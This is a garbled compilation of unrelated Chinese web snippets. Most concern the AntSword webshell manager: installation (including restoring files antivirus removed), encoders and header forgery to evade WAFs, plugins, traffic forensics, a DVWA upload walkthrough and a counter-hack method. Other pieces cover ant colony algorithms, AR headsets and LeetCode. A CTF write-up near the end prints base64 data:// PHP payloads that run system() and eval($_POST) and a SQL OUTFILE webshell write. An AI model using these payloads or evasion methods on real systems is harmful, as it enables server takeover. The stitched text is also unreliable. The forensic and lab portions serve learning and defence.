中国蚁剑: 向中国菜刀致敬! 中国蚁剑:一款跨平台的开源网站管理工具 github地址: 蚁剑源代码 https://github.com/AntSwordProject 蚁剑加载器 https://github.com/AntSwordProject 46,售后保障稳定 安装教程: 两个全部解压好(一个是源码,一个是启动文件/加载器) 先打开 AntSword-Loader-x64(加载器)文件夹里面的 AntSword.exe 点击初始化(选择蚁剑工作目录
在专业的网站管理软件中,"中国菜刀"早已是神话,中国菜刀简单好用,安装也没什么难度,会解压就行了,如果不会的话,附上一个解决方法: 正文开始 蚁剑是一款优秀且合法还开源的跨平台网站管理软件,使用方法和 "中国菜刀"大同小异 安装 蚁剑可以在Windows,Linux,Mac OS上使用,以Windows作为示例 链接一:AntSwordProject/AntSword-Loader 链接二:https ://github.com/AntSwordProject/antSword 上面两个是安装蚁剑的必需品,缺一不可 第一个链接: 图一 第二个链接: 图二 安装步骤 ①在第一个链接中,往下面拖动,
2024/5/11 中国蚁剑 安装教程 一、下载中国蚁剑的加载器和核心源码(两个都要用到) github官方下载地址:https://github.com/AntSwordProject/ 参考文档:antSword 小问题: 下载中国蚁剑的核心源码时,可能因为检测到病毒无法下载,或文件被防火墙删除。 前往“Windows防护中心”–>“保护历史记录”,选择“操作”中的“还原”,就可以解决问题。
之前讲过 RSA 非对称加密请求包,那这一篇我们就来多花一些时间,详细讲一讲蚁剑的「发包方式」、「编码器」、「解码器」这几个组件的用法。 为方便解释,我们后面统一都以 PHP 为例来说,毕竟蚁剑现在支持最好的就是 PHP(实际是本穷逼买不起高配电脑,开不起虚拟机,只能在 docker 里面开一开 PHP 环境)。 3.2) base64 的兄弟姐妹 后来,蚁剑引入了 CHR、CHR16、ROT13 编码器,跟 base64 的原理一样,只是把大量的功能性代码藏了起来而已。 然后再说蚁剑解码器里,解密部分的代码: 重点已经标出来了,一定要保证算法一致性。 经过 Header 伪造、发包方式修改、编码器、解码器这一轮洗礼下来,蚁剑的流量上基本已经没有太多特征性的东西了。有攻也得有守嘛不是。那该怎么防呢?
项目名称:As-Exploits 项目作者:yzddmr6 项目地址: https://github.com/yzddmr6/As-Exploits 前言 冰蝎跟哥斯拉都有了各自的一些后渗透模块, 然而蚁剑这一块基本还是空缺,所以就萌生出来做一个蚁剑的后渗透框架插件的想法。 目前插件的定位是蚁剑的一个微内核拓展模块,可以迅速做到payload的工程化,不用过多时间浪费在插件的结构上。 蚁剑没有java环境,那么是如何做到用node修改字节码的呢? test_command"] = this.form.getItemValue("test_command"); return args; } } module.exports = Test; 运行结果 重启蚁剑后再打开插件就可以使用我们的新模块了
前言 转载来自:yzddMr6师傅blog 原文链接:https://yzddmr6.tk/posts/node-edit-java-class/ 本人有意写一份系列文章,主要内容是分享蚁剑改造过程中的一些技巧与经验 即使是蚁剑编码器仓库中的aes编码器也只是对主payload加了密,防护方在不需要解密主payload的情况下只要看到其他参数传的什么内容就能推测攻击者的行为。 yan表哥曾经在公众号中的WAF拦了蚁剑发送的其它参数时怎么操作文章中给出了一种解决方案。主要思想就是在不修改主payload的情况下,配合客户端额外再把它加密解密一遍。 蚁剑这么有名的项目,一定是防火墙商眼中紧盯的目标。最好的解决办法就是加入一个用户可控的参数,能够让用户自定义修改。这样才有可能最大程度的逃过WAF的流量查杀。 修改模版前要简单了解一下蚁剑对于参数的处理流程 在各类型shell的模版文件中,会定义默认的payload以及他们所需要的参数,还有对于参数的编码方式。
在HTTP请求体中看到明显的蚁剑webshell木马特征,连接密码是:1。 先将变量值删除前2个字符,再分别进行URL解码和Base64解码,得到蚁剑webshell木马执行的命令:cd "/var/www/html";id;echo e124bc;pwd;echo 43523 三、黑客读取了哪个文件的内容,提交文件绝对路径 点击Stream旁的上下箭头切换Stream,并逐个复制HTTP请求体中蚁剑webshell木马payload的最后一个变量值,先删除前2个字符,再分别进行 四、黑客上传了什么文件到服务器,提交文件名 将6个蚁剑webshell木马的请求内容全部解码,得到: 1、cd "/var/www/html";id;echo e124bc;pwd;echo 43523 将蚁剑webshell木马的payload进行URL解码。 再进行JS美化,得到2个变量。
联想Mirage AR“光剑”头显国内开售,首发价1999元 昨日,联想在哈尔滨召开的联想创新科技大会·哈尔滨峰会上,宣布正式在国内发布联想Mirage AR“光剑”头显,首发价1999元。 用户可使用高度还原星球大战光剑的手柄,在星战的经典场景与熟悉的星战角色一决高下。 VRPinea独家点评:国内售价比国外售价高了好几百元呢! 蚁视将推AR/VR头显蚁视Mix 据悉,蚁视将推出一款AR/VR头显蚁视 Mix。该头显的具体技术参数还未曝光,不过据蚁视方面透露,蚁视Mix采用了其独家专利,自主研发的光机。 蚁视 Mix 将在Kickstarter上开启众筹,此外,蚁视Mix DK版和蚁视Mix ONE样机将亮相CES 2018。
▌漏洞描述 文件上传未做校验,可以上传木马文件到服务器上,从而获取服务器控制权限 ▌演示环境 本地搭建的测试环境 dvwa burpsuite等抓包工具 蚁剑等shell管理工具 ▌演示过程详解 ➊ ➑使用工具,像上一步那样一步一步操作效率太低了,所以用到了蚁剑shell管理工具 操作如下,填写添加url(第⑤上传的shell.php文件路径)http://172.16.152.132/DVWA-master ➒已经获取了web的权限,可以使用蚁剑的其它功能做更多的操作 ?
核心思想 蚁群觅食过程中,每只蚂蚁在所走过的路径上均会释放出一种信息素,该信息素随时间的推移逐渐挥发。因此,每条路径上的信息素同时存在正负反馈两种机制。 因此,在理想情况下,整个蚁群将逐渐向信息素浓度最高的路径(即最短路径)进行转移。 self.path.append(B) self.path[-1], self.path[-2] = self.path[-2], self.path[-1] # 构建“蚁群算法 # 记录每次迭代后所有蚂蚁的路径长度信息 self.best_path = np.zeros(self.maxIter) # 记录每次迭代后整个蚁群的 self): # 数据可视化展示 plt.figure(figsize=(6,
使用蚁剑进行连接,密码为上面的123: ? 添加请求头字段,发送一句话木马: ? 连接成功: ? 溯源分析 翻找本地文件,可以找到大量作案工具: ? 以及定点进行的信息收集: ? 5.2.17版本,替换其中的php_xmlrpc.dll: https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-
算法背景及原理 蚁群算法是一种智能优化算法,在TSP商旅问题上得到广泛使用。蚁群算法于1992年由Marco Dorigo首次提出,该算法来源于蚂蚁觅食行为。 算法应用 蚁群算法被应用于数据分析、机器人协作求解、电力、通信、水利、交通、建筑等领域。 信息素因子 表示蚂蚁运动过程中路径上积累的信息素的量在指导蚁群搜索中的相对重要程度。 启发函数因子 表示启发式信息在指导蚁群搜索过程中的相对重要程度。如果该参数设置过大,会使收敛速度加快,但是容易陷入局部最优;如果该参数设置过小,会导致蚁群搜索随机性变大,很难找到最优解。 新增信息素含量根据不同规则可以将蚁群算法分为以下三种模型,分别是蚁周模型、蚁量模型以及蚁密模型,具体大家可根据需要进行学习。
溯源反制-Webshell工具-Antsword
蓝队通过修改后门的代码实现获得蚁剑使用者的权限
正常情况下,PHP后门上线
发现PHP后门,修改webshell进行反制
复现环境:
蓝队:Linux php
header('HTTP/1.1 500 ');
这里说明一下,最新版本的剑蚁已经不支持了 测试版本是2.0.7 最新版本为2.1.15 蓝队:Linux Web
红队:Windows10 Goby
对抗Cobaltstrike中的手段:
1、伪造流量批量上线(欺骗防御)
https://mp.weixin.qq.com/s/VCRg6F9Wq-yg-qajDoJuaw
0.寻找峰值 关键点: 返回任意一个峰值的下标即可 nums[-1]=nums[n]=负无穷 输入:nums = [1,2,3,1] 输出:2 解释:3 是峰值元素,你的函数应该返回其索引 2 1.傻瓜编程(纯属玩乐) class Solution { public: int findPeakElement(vector<int>& a) { int n=a.size(); if(n==1) { return
「剑指 Offer 53 - I. 在排序数组中查找数字 I」 力扣题目链接[1] 统计一个数字在排序数组中出现的次数。 示例 1: 输入: nums = [5,7,7,8,8,10], target = 8 输出: 2 示例 2: 输入: nums = [5,7,7,8,8,10], target = 6 输出: 0
蚁群算法的基本原理 蚁群算法(Ant Colony Optimization, ACO)是通过模拟蚂蚁觅食的原理,设计出的一种群集智能算法。 蚁群算法的重要原则 避障原则,蚂蚁不能穿过障碍物。 播发信息素规则,蚁群在刚离开窝或者事物附近播散的信息素最多。 范围,蚂蚁只能感知到自己周围的环境。
本文我们一起学下常用于路径优化的蚁群算法,主要内容如下: 蚁群算法简介 蚁群算法原理 蚁群算法实例 1.蚁群算法简介 如何寻找一条合适的路径,几乎是一个永恒的话题。每个人、每天都会遇到。 他们在研究蚂蚁觅食的过程中,发现蚁群整体会体现一些智能的行为,例如蚁群可以在不同的环境下,寻找最短到达食物源的路径。 ? 2.蚁群算法原理 蚁群算法是从自然界中真实蚂蚁觅食的群体行为得到启发而提出的,其很多观点都来源于真实蚁群,因此算法中所定义的人工蚂蚁与真实蚂蚁存在一定的辩证关系。 自组织行为特征 蚁群的自组织行为特征主要有: 高度结构化的组织 虽然蚂蚁的个体行为极其简单,但由个体组成的蚁群却构成高度结构化的社会组织,蚂蚁社会的成员有分工,有相互的通信和信息传递。 至此,我们从蚁群算法的简介,原理以及实例方面对蚁群算法进行了详细的阐述,希望对大家有所帮助。 ♥点个赞再走呗♥
6、查找和排序 把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。 输入一个非减排序的数组的一个旋转,输出旋转数组的最小元素。
分布式与集群的区别 为了让厨师专心炒菜,把菜做到极致,又请了个配菜师负责切菜,备菜,备料,厨师和配菜师的关系是分布式,一个配菜师也忙不过来了,又请了个配菜师,两个配菜师关系是集群; 分布式:不同活 集群:同一种活 蚁群算法 将蚁群算法应用于解决优化问题的基本思路为:用蚂蚁的行走路径表示待优化问题的可行解,整个蚂蚁群体的所有路径构成待优化问题的解空间。 两者的巧妙结合使智能行为涌现,如果多样性过剩,系统过于活跃,会导致过多的随机运动,陷入混沌状态;如果多样性不够,正反馈过强,会导致僵化,当环境变化时蚁群不能相应调整。 【数之道 04】解决最优路径问题的妙招-蚁群ACO算法_哔哩哔哩_bilibili
文章目录 一、Web_php_include 二、使用步骤 1.点击获取在线场景 2.查看页面 3.大小写绕过 4.data://伪协议执行命令利用 4.中国蚁剑 5.数据库写入马 总结 ---- 一、 data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg== 查看源码得到flag 4.中国蚁剑 page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1RbeGlhb2h1YV0pOyA/Pg== 蚁剑连接就好 5.数据库写入马 御剑扫描获得phpmyadmin secure_file_priv" linux默认tmp是可写目录 试试写入一句话马 菜刀连接 SELECT "" INTO OUTFILE '/tmp/test1.php' flag为:ctf{876a5fca-96c6- 4cbd-9075-46f0c89475d2} ---- 总结 伪协议 菜刀,蚁剑 数据库写入马